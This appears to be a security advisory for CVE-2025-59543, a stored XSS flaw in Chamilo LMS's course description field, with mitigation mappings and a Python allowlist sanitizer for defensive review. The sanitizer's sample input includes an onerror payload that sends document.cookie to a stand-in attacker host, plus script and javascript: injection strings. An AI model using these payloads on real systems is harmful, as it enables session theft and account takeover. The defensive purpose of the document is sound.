CVE-2025-59543
Published: 06 March 2026
Summary
CVE-2025-59543 is a critical-severity stored cross-site scripting (CWE-79) vulnerability in Chamilo LMS. Its CVSS v3.1 base score is 9.0 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique JavaScript (T1059.007). The CVE ranks at the 15.4th percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
SI-10 requires validating inputs like course descriptions to prevent injection of malicious JavaScript, directly addressing the insufficient input sanitization causing this stored XSS.
SI-15 mandates filtering information outputs, such as encoding user-supplied course descriptions before rendering, to block execution of injected scripts in viewers' browsers.
SI-2 ensures timely flaw remediation, including patching to version 1.11.34, which fixes the specific XSS vulnerability in the course description field.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS gives the attacker arbitrary JavaScript execution in victims' browsers (JavaScript, T1059.007). From there the script can steal session cookies (Steal Web Session Cookie, T1539) or abuse the victim's authenticated session directly (Browser Session Hijacking, T1185), either of which leads to account takeover.
NVD Description
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course description field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code in the context of any other user viewing the course information page, including administrators. This allows an attacker to exfiltrate sensitive session cookies or tokens, resulting in account takeover (ATO) of higher-privileged users. This issue has been patched in version 1.11.34.
Deeper analysis
CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting Chamilo, an open-source learning management system (LMS). The flaw exists in versions prior to 1.11.34, specifically within the course description field, where insufficient input sanitization allows the injection of malicious JavaScript code. The issue carries a Critical CVSS v3.1 base score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H). The score reflects high impact on confidentiality, integrity and availability, and the changed scope (S:C): the payload is stored by a low-privileged trainer but executes in the browser of whichever user views the page, so the victim's privileges, not the attacker's, bound the damage.
An attacker with a low-privileged account, such as a trainer, can exploit this vulnerability by injecting malicious JavaScript into the course description field. When any other user, including administrators, views the course information page, the script executes in their browser context. This enables the theft of sensitive data like session cookies or authentication tokens, potentially leading to account takeover (ATO) of higher-privileged users.
The vulnerability has been addressed in Chamilo version 1.11.34, as detailed in the official release notes and a corresponding GitHub security advisory (GHSA-p32q-6gh3-3gcv). Security practitioners should prioritize upgrading to the patched version and review existing course descriptions for payloads stored before the upgrade, since a sanitization fix does not by itself clean content already persisted. A content security policy (CSP) adds a further layer of XSS mitigation in Chamilo deployments.
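The two controls named above (SI-10 input validation, SI-15 output filtering) and the post-upgrade review of stored descriptions can be exercised with one small tool. The following is an added example, not Chamilo's code and not the project's fix: it shows strict HTML encoding for a plain-text field, an allowlist sanitizer for a rich-text field that also reports everything it stripped, and a review pass that flags stored descriptions needing a look. The course rows and the payload string are constructed for the example; the allowed tag and attribute sets are assumptions chosen for illustration, not Chamilo's policy.

```python
import html
import re
from html.parser import HTMLParser

# Constructed payload illustrating what a low-privileged author might store
# in a description field (hypothetical; not the advisory's payload).
SAMPLE_DESCRIPTION = (
    '<p>Intro to <b>Networking</b>. '
    '<a href="https://example.org/syllabus">Syllabus</a></p>'
    '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">'
    '<script>alert(document.cookie)</script>'
    '<a href="javascript:alert(1)">click</a>'
)

# Constructed table of (course_id, stored_description) rows to review.
COURSE_ROWS = [
    (1, '<p>Benign <i>course</i> with a <a href="/courses/1">link</a>.</p>'),
    (2, SAMPLE_DESCRIPTION),
]


def render_plain(description):
    """SI-15 for a plain-text field: encode every HTML metacharacter before output."""
    return html.escape(description, quote=True)


# Assumed allowlist for a rich-text description (illustrative policy).
ALLOWED_TAGS = {"p", "b", "i", "strong", "em", "ul", "ol", "li", "a", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
SAFE_URL = re.compile(r"^(https?:|mailto:|/)", re.IGNORECASE)


class AllowlistSanitizer(HTMLParser):
    """Rebuild markup from parsed tokens, keeping only allowlisted tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # audit trail of everything removed
        self.skip_depth = 0    # > 0 while inside <script>/<style> content

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.dropped.append(f"<{tag}> element")
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}> tag")
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{name} attribute on <{tag}>")  # catches on* handlers
                continue
            if name == "href" and not SAFE_URL.match((value or "").strip()):
                self.dropped.append(f"href scheme on <a>: {value!r}")   # javascript:, data:, ...
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth:
            return
        # Text is re-encoded on output, so "&lt;script&gt;" in the input stays inert.
        self.out.append(html.escape(data, quote=False))


def sanitize_rich_text(description):
    """Return (clean_html, dropped_items) for a stored rich-text description."""
    p = AllowlistSanitizer()
    p.feed(description)
    p.close()
    return "".join(p.out), p.dropped


def find_suspect_descriptions(rows):
    """Post-upgrade review: any stored description the sanitizer would alter gets flagged."""
    findings = []
    for course_id, description in rows:
        _, dropped = sanitize_rich_text(description)
        if dropped:
            findings.append((course_id, dropped))
    return findings


if __name__ == "__main__":
    clean, dropped = sanitize_rich_text(SAMPLE_DESCRIPTION)
    print("clean:", clean)
    print("dropped:", dropped)
    print("suspect courses:", find_suspect_descriptions(COURSE_ROWS))
```

Encoding alone (render_plain) is the right answer when the field is meant to hold plain text; when it is meant to hold formatted HTML, encoding would break legitimate markup, so the allowlist approach is the realistic shape of the fix, and its dropped list doubles as the review signal for descriptions saved before the patch. In production, a maintained sanitizer library is preferable to hand-rolled parsing.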
Details
- CWE(s)